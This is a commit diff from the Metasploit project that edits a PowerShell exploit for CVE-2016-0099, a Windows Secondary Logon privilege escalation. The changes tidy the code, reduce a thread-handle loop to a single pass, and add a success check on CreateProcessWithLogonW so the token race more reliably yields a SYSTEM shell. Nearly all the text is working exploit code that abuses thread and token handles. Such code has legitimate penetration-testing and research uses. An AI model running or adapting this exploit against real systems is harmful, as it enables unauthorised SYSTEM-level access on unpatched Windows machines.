Land rapid7#7151, Improve CVE-2016-0099 reliability

Author: Brent Cook

data/exploits/CVE-2016-0099/cve_2016_0099.ps1

@@ -155,8 +155,8 @@ Add-Type -TypeDefinition @"
         # CreateProcessWithLogonW --> lpCurrentDirectory
         $GetCurrentPath = (Get-Item -Path ".\" -Verbose).FullName
 
-	$path1 = $env:windir
-    	$path1 = "$path1\System32\cmd.exe"
+        $path1 = $env:windir
+        $path1 = "$path1\System32\cmd.exe"
         # LOGON_NETCREDENTIALS_ONLY / CREATE_SUSPENDED
         $CallResult = [Advapi32]::CreateProcessWithLogonW(
             "user", "domain", "pass",
@@ -242,8 +242,8 @@ Add-Type -TypeDefinition @"
     $TidArray = @()
 
     echo "[>] Duplicating CreateProcessWithLogonW handles.."
-    # Loop Get-ThreadHandle and collect thread handles with a valid TID
-    for ($i=0; $i -lt 500; $i++) {
+    # Loop 1 is fine, this never fails unless patched in which case the handle is 0
+    for ($i=0; $i -lt 1; $i++) {
         $hThread = Get-ThreadHandle
         $hThreadID = [Kernel32]::GetThreadId($hThread)
         # Bit hacky/lazy, filters on uniq/valid TID's to create $ThreadArray
@@ -309,6 +309,19 @@ Add-Type -TypeDefinition @"
             0x00000002, $cmd, $args1,
             0x00000004, $null, $GetCurrentPath,
             [ref]$StartupInfo, [ref]$ProcessInfo)
+
+    #---
+    # Make sure CreateProcessWithLogonW ran successfully! If not, skip loop.
+    #---
+    # Missing this check used to cause the exploit to fail sometimes.
+    # If CreateProcessWithLogon fails OpenProcessToken won't succeed
+    # but we obviously don't have a SYSTEM shell :'( . Should be 100%
+    # reliable now!
+    #---
+    if (!$CallResult) {
+        continue
+    }
+
         $hTokenHandle = [IntPtr]::Zero
         $CallResult = [Advapi32]::OpenProcessToken($ProcessInfo.hProcess, 0x28, [ref]$hTokenHandle)
 
@@ -331,4 +344,4 @@ Add-Type -TypeDefinition @"
         $StartTokenRace.Stop()
         $SafeGuard.Stop()
     }
-    exit
+    exit